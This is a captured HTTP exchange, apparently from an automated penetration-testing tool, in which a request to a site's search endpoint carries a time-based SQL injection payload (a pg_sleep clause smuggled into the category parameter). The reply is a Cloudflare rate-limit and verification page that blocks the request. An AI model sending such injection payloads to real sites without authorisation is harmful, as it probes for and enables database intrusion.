REQUEST:
GET https://my.myfirst.tech/search?category=1%27%20AND%20pg_sleep%285%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9335
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8476deee9a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=UHqB0TI4kAE6dHwMH8tYOVi%2Fu%2BEoV0xiX0ELHgxfGlFWLOo7srgY6%2B6zuLi%2BxD6IMnYPFgjlM3AhWG2iG5JSSfbivyVdogRQ%2Fw%2F6iNgYC%2BzV0eNYGeBl84qMs49ecUUQ4w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8476deee9a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'nzOlIEGeN8NQDqMGTFpcWtShtLemJ9UgJooesQ9kstQ-1784281161-1.2.1.1-wg0Ca2Be6NewSiTABQ6_OJu_.9u6rjxBmU.0iBdTsTlbUTQdGBkidJIaoDBKpqdH',cITimeS: '1784281161',cRay: 'a1c8476deee9a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?category=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_tk=uTA8deEFkEDiKpkKgJ0ITYyzQjGnnjG9nHsKYX8gc7I-1784281161-1.0.1.1-wAHb2FEv75fi5CmYVdkRQcgkuPsH.r7vuaNHkGoKTIY",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?category=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_f_tk=uTA8deEFkEDiKpkKgJ0ITYyzQjGnnjG9nHsKYX8gc7I-1784281161-1.0.1.1-wAHb2FEv75fi5CmYVdkRQcgkuPsH.r7vuaNHkGoKTIY",md: 'Ds27fW9xbARsKvM787UnyFwWnnHA8AEELWHYfEfSz1o-1784281161-1.2.1.1-iSI_AEIvJ2xlFg4olk19B735u6KyJG.KnNTyane6jrNklHQ4rXEjKL9uzeF8yGHg_LrYgHyb.0iBVFDuckveHd6BfxeHG8XytBRQBPEZVRNrnTl89YQkdNCXY8odiRR9_XSSh93gcg_7PDBkrzdTa2VaoSKCBiEXYu4drgR5LrGUQhMziH02zxjGKUm3jd5yvar.9mV_rOzqQWvokrHdM8Tx7l0juzfKoy3ktUT.0n81qmSf8vBNhsdIWZRKC.bF1QfZ9bH_f0bNFs2IswVLB8kVahotk53xdYQB7BVW3BQkVRX6b2XvCWSuI.VgdnQ0FeFOX9aBV0FEKU.uXHkLB.5fLZcuonJj2tdEFeY0BCXw5nlpVBhMBoT.EHjAEGWAU7act12fgh7wtnpcgQ6gX28Oke_vMf_APSYKXb_00O4mVoHQxLVfsuG8ePeYlBDsnNN_pjL5sSNNJEgb1zDDf6fTHy4Z0glLKQGasx1Rvb2DEnlse9HC7qbt.DqSrddPB6nl0xTAPVKyeFVuK3iWksrwVJ0_uPwOcEICm37y.imq0SYJ6KroKWvayj7kDvgV1M3XZufu5m5VY7KYIZ.HmnQnVX0JSuOBhwFVYd_S5zl0jdAoJjsiduoq3pjHjAabIu9XayfFkafzLBCNk9_XUj28GH84oR5nwuJQSIrHMF4TpthexwbmiwH39KkkamVBa2H9FWpPrHDoh7fFa3tOQRshY4JfT7qnTk2CRHYwd.rJfshFfDfJqfLhaGp.jvgYZPKUsoDbgeoWAqFvzHyBkn9rTK7AdijHZ1k6quyZGVFUCjAsdqlMubn.b6IT6bVO_d_tJnDuLs1pWmy9Y6Ao1jqg98TK7etNzZ8xqIVI_4I1ThjPEesqobbM..2525CV6agSXiJZVDI4VaNELwFy8ppu8LDltHPNjOWsYNPjSKmyHWmS.zHsV9KA9zO9GI5wuhon9lSqMQVrrVDC.lNITHLsXMp3_LiruWeF2Nc_GBsmFTnWVCt2wifpbmj6Zs0LXYK..l3WcTApWrblAOyxaNOOx7oFo4qCu7u3J6cCkH4AfoTkJ1czFMfW.i_OD15YCl7ItJeJppn2D8Mxu8gPNjI5phSHTL0Wyvaif.OduMhCB2BG5ALZwUCadExH5orGVlrgxfQe6S08ZQW5rdbloNvXHKX7qkph8Lzxx367M3w',mdrd: 'qjtpf.oAZqfNZaVqqIbCqIcjMizv8TuE0uoU8ki54Hg-1784281161-1.2.1.1-YbZS.RcI5qUkA8FMwx2Ejjjzq4ke7jy.pXkeowOu59G6FfFfboQsbqfyU.eyaTBPQ4FAngmYpfpoR.cC0k5fiM75ncFWnWdJYUZY4Ic3Q9zM4Ge.W1n.88yzdeoIQnKnmNX.WU6gL1uFy829wdGwSajG8NMbJEX0uhkzjSDBaIpK7ulQAIXYwthuddvinOMdzRt1SDaSRVO8GcMhRa9ydg7yWhZlHZIbaq7.fLW4lr2Zy.0F2nEd3yBjFmQY13Dk',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8476deee9a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?category=1%27+AND+pg_sleep%285%29--\u0026__cf_chl_rt_tk=uTA8deEFkEDiKpkKgJ0ITYyzQjGnnjG9nHsKYX8gc7I-1784281161-1.0.1.1-wAHb2FEv75fi5CmYVdkRQcgkuPsH.r7vuaNHkGoKTIY"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
